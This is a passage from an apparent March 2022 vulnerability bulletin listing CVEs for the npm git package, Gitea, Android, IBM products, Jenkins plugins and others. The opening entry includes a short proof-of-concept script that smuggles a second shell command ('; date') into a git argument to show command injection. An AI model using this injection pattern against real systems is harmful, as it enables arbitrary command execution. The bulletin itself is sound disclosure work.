All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require(“git”).Git; var repo = new Git(“repo-test”); var user_input = “version; date”; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work. 2022-03-17 not yet calculated CVE-2021-23632
MISC
gitea — gitea
 
The avatar middleware in Gitea before 1.13.6 allows Directory Traversal via a crafted URL. 2022-03-15 not yet calculated CVE-2021-29134
MISC
MISC
glewlwyd — sso_server
 
scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion. 2022-03-18 not yet calculated CVE-2022-27240
MISC
MISC
go-ethereum — go-ethereum
 
Go-Ethereum v1.10.9 was discovered to contain an issue which allows attackers to cause a denial of service (DoS) via sending an excessive amount of messages to a node. This is caused by missing memory in the component /ethash/algorithm.go. 2022-03-17 not yet calculated CVE-2021-42219
MISC
golang — go
 
golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey. 2022-03-18 not yet calculated CVE-2022-27191
CONFIRM
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204585345References: N/A 2022-03-16 not yet calculated CVE-2021-39722
MISC
google — android In usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161010552References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39792
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-209014813References: N/A 2022-03-16 not yet calculated CVE-2021-39723
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-208229524References: N/A 2022-03-16 not yet calculated CVE-2021-39737
MISC
google — android In TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205753190References: N/A 2022-03-16 not yet calculated CVE-2021-39724
MISC
google — android In gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151454974References: N/A 2022-03-16 not yet calculated CVE-2021-39725
MISC
google — android In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-181782896References: N/A 2022-03-16 not yet calculated CVE-2021-39726
MISC
google — android In copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205992503References: N/A 2022-03-16 not yet calculated CVE-2021-39732
MISC
google — android In eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196388042References: N/A 2022-03-16 not yet calculated CVE-2021-39727
MISC
google — android In prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995773References: N/A 2022-03-16 not yet calculated CVE-2021-39736
MISC
google — android In amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206128522References: N/A 2022-03-16 not yet calculated CVE-2021-39733
MISC
google — android In sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208650395References: N/A 2022-03-16 not yet calculated CVE-2021-39734
MISC
google — android In the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202006191References: N/A 2022-03-16 not yet calculated CVE-2021-39729
MISC
google — android In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A 2022-03-16 not yet calculated CVE-2021-39793
MISC
google — android In TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206472503References: N/A 2022-03-16 not yet calculated CVE-2021-39730
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205036834References: N/A 2022-03-16 not yet calculated CVE-2021-39731
MISC
google — android In gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151455484References: N/A 2022-03-16 not yet calculated CVE-2021-39735
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-206977562References: N/A 2022-03-16 not yet calculated CVE-2021-39716
MISC
google — android In onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-205150380 2022-03-16 not yet calculated CVE-2021-39702
MISC
google — android In multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206090748 2022-03-16 not yet calculated CVE-2021-39689
MISC
google — android In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39685
MISC
google — android In setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-204316511 2022-03-16 not yet calculated CVE-2021-39690
MISC
google — android In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539 2022-03-16 not yet calculated CVE-2021-39692
MISC
google — android In onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208662370 2022-03-16 not yet calculated CVE-2021-39693
MISC
google — android In ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-205702093 2022-03-16 not yet calculated CVE-2021-39667
MISC
google — android In parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-202312327 2022-03-16 not yet calculated CVE-2021-39694
MISC
google — android In createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-209607944 2022-03-16 not yet calculated CVE-2021-39695
MISC
google — android In checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-200813547 2022-03-16 not yet calculated CVE-2021-39697
MISC
google — android In aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-185125206References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39698
MISC
google — android In serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-212286849 2022-03-16 not yet calculated CVE-2021-39701
MISC
google — android In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195726151References: N/A 2022-03-16 not yet calculated CVE-2021-39721
MISC
google — android In updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-207057578 2022-03-16 not yet calculated CVE-2021-39703
MISC
google — android In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481 2022-03-16 not yet calculated CVE-2021-39704
MISC
google — android In getNotificationTag of LegacyVoicemailNotifier.java, there is a possible leak of ICCID due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-186026746 2022-03-16 not yet calculated CVE-2021-39705
MISC
google — android In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168 2022-03-16 not yet calculated CVE-2021-39706
MISC
google — android In onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200688991 2022-03-16 not yet calculated CVE-2021-39707
MISC
google — android In __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178379135References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39715
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-207433926References: N/A 2022-03-16 not yet calculated CVE-2021-39720
MISC
google — android In lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995178References: N/A 2022-03-16 not yet calculated CVE-2021-39719
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205035540References: N/A 2022-03-16 not yet calculated CVE-2021-39718
MISC
google — android In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206128341 2022-03-16 not yet calculated CVE-2021-39708
MISC
google — android In iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198653629References: N/A 2022-03-16 not yet calculated CVE-2021-39717
MISC
google — android In ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205573273References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39714
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39713
MISC
google — android In TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A 2022-03-16 not yet calculated CVE-2021-39712
MISC
google — android In bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to Incorrect Size Value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154175781References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39711
MISC
google — android Product: AndroidVersions: Android kernelAndroid ID: A-202160245References: N/A 2022-03-16 not yet calculated CVE-2021-39710
MISC
google — android In sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208817618 2022-03-16 not yet calculated CVE-2021-39709
MISC
google — android In several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200688826References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39686
MISC
google — android
 
In Package Manger, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-67862680 2022-03-16 not yet calculated CVE-2021-39624
MISC
google — android
 
In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-193149550 2022-03-16 not yet calculated CVE-2021-0957
MISC
google — sa360-webquery-bigquery
 
A local attacker could read files from some other users’ SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above. 2022-03-18 not yet calculated CVE-2021-22571
CONFIRM
CONFIRM
gpac — gpac GPAC 1.0.1 is affected by a heap-based buffer overflow in SFS_AddString () at bifs/script_dec.c. 2022-03-14 not yet calculated CVE-2022-24578
MISC
gpac — gpac
 
GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen (). 2022-03-14 not yet calculated CVE-2022-24577
MISC
gradio — gradio
 
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer’s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user’s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs. 2022-03-17 not yet calculated CVE-2022-24770
CONFIRM
MISC
MISC
gradle_enterprise — gradle_enterprise Gradle Enterprise before 2021.4.3 relies on cleartext data transmission in some situations. It uses Keycloak for identity management services. During the sign-in process, Keycloak sets browser cookies that effectively provide remember-me functionality. For backwards compatibility with older Safari versions, Keycloak sets a duplicate of the cookie without the Secure attribute, which allows the cookie to be sent when accessing the location that cookie is set for via HTTP. This creates the potential for an attacker (with the ability to impersonate the Gradle Enterprise host) to capture the login session of a user by having them click an http:// link to the server, despite the real server requiring HTTPS. 2022-03-16 not yet calculated CVE-2022-27225
MISC
gradle_enterprise — gradle_enterprise
 
In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.) 2022-03-17 not yet calculated CVE-2022-25364
MISC
MISC
hestiacp — hestiacp
 
Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11. 2022-03-16 not yet calculated CVE-2022-0986
MISC
CONFIRM
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in department.php. 2022-03-15 not yet calculated CVE-2022-25490
MISC
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in appointment.php. 2022-03-15 not yet calculated CVE-2022-25491
MISC
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the medicineid parameter in ajaxmedicine.php. 2022-03-15 not yet calculated CVE-2022-25492
MISC
hms — hms
 
HMS v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via treatmentrecord.php. 2022-03-15 not yet calculated CVE-2022-25493
MISC
htmldoc — htmldoc A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service. 2022-03-16 not yet calculated CVE-2021-23165
MISC
MISC
MISC
MISC
htmldoc — htmldoc
 
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service. 2022-03-16 not yet calculated CVE-2021-23158
MISC
MISC
MISC
httpie — httpie
 
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0. 2022-03-15 not yet calculated CVE-2022-0430
MISC
CONFIRM
ibm — big_sql_and_cloud_pak_for_data
 
IBM Big SQL on IBM Cloud Pak for Data 7.1.0, 7.1.1, 7.2.0, and 7.2.3 could allow an authenticated user with appropriate permissions to obtain sensitive information by bypassing data masking rules using a CREATE TABLE SELECT statement. IBM X-Force ID: 220480. 2022-03-14 not yet calculated CVE-2022-22353
CONFIRM
XF
ibm — business_automation_workflow
 
IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346. 2022-03-18 not yet calculated CVE-2021-39046
XF
CONFIRM
ibm — data_virtualization
 
IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitve information. IBM X-Force ID: 212620. 2022-03-14 not yet calculated CVE-2021-38971
XF
CONFIRM
ibm — engineering_requirements_quality_assistant
 
IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413. 2022-03-18 not yet calculated CVE-2021-29899
CONFIRM
XF
ibm — engineering_workflow_management
 
IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707. 2022-03-15 not yet calculated CVE-2020-4989
CONFIRM
XF
ibm — spectrum_copy_data_management IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534. 2022-03-14 not yet calculated CVE-2021-39055
CONFIRM
XF
ibm — spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 220038 2022-03-14 not yet calculated CVE-2022-22344
CONFIRM
XF
ibm — spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441. 2022-03-14 not yet calculated CVE-2021-39051
CONFIRM
XF
ibm — spectrum_protect_operations_center
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 220048. 2022-03-14 not yet calculated CVE-2022-22346
CONFIRM
XF
ibm — spectrum_protect_operations_centers
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to reverse tabnabbing where it could allow a page linked to from within Operations Center to rewrite it. An administrator could enter a link to a malicious URL that another administrator could then click. Once clicked, that malicious URL could then rewrite the original page with a phishing page. IBM X-Force ID: 220139. 2022-03-14 not yet calculated CVE-2022-22348
CONFIRM
XF
ibm — spectrum_protect_plus
 
IBM Spectrum Protect Plus 10.1.0.0 through 10.1.9.2 and IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 do not limit the length of a connection which could allow for a Slowloris HTTP denial of service attack to take place. This can cause the Admin Console to become unresponsive. IBM X-Force ID: 220485. 2022-03-14 not yet calculated CVE-2022-22354
CONFIRM
CONFIRM
XF
in_pluck — in_pluck
 
In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. 2022-03-18 not yet calculated CVE-2022-26965
MISC
MISC
irz — mobile_routers
 
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor’s defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router’s default credentials aren’t rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. 2022-03-19 not yet calculated CVE-2022-27226
MISC
MISC
MISC
jenkins — cloudbees_aws_credentials
 
A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27199
CONFIRM
MLIST
jenkins — cloudbees_aws_credentials
 
A cross-site request forgery (CSRF) vulnerability in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27198
CONFIRM
MLIST
jenkins — dashboard_view
 
Jenkins Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet’s Iframe source URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views. 2022-03-15 not yet calculated CVE-2022-27197
CONFIRM
MLIST
jenkins — dbcharts
 
Jenkins dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27216
CONFIRM
MLIST
jenkins — environment_dashboard
 
Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission. 2022-03-15 not yet calculated CVE-2022-27213
CONFIRM
MLIST
jenkins — extended_choice Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27203
CONFIRM
MLIST
jenkins — extended_choice Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier does not escape the value and description of extended choice parameters of radio buttons or check boxes type, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27202
CONFIRM
MLIST
jenkins — extended_choice
 
A cross-site request forgery vulnerability in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27204
CONFIRM
MLIST
jenkins — extended_choice
 
A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27205
CONFIRM
MLIST
jenkins — favorite
 
Jenkins Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions. 2022-03-15 not yet calculated CVE-2022-27196
CONFIRM
MLIST
jenkins — folder-based_authorization_strategy
 
Jenkins Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27200
CONFIRM
MLIST
jenkins — git_branches_parameter
 
Jenkins List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name of the ‘List Git branches (and more)’ parameter, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27212
CONFIRM
MLIST
jenkins — gitlab_authentication
 
Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27206
CONFIRM
MLIST
jenkins — global-build-stats
 
Jenkins global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the ‘Global Build Stats’ page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27207
CONFIRM
MLIST
jenkins — incapptic_connect_uploader
 
Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27218
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows users with Credentials/Create permission to read arbitrary files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27208
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A missing/An incorrect permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27211
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27210
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27209
CONFIRM
MLIST
jenkins — parameterized_trigger
 
Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27195
CONFIRM
MLIST
jenkins — release_helper
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27214
CONFIRM
MLIST
jenkins — release_helper
 
A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27215
CONFIRM
MLIST
jenkins — semantic_versioning
 
Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. 2022-03-15 not yet calculated CVE-2022-27201
CONFIRM
MLIST
jenkins — vmware_vrealize_codestream
 
Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27217
CONFIRM
MLIST
kingsoft — internet_security_9_plus
 
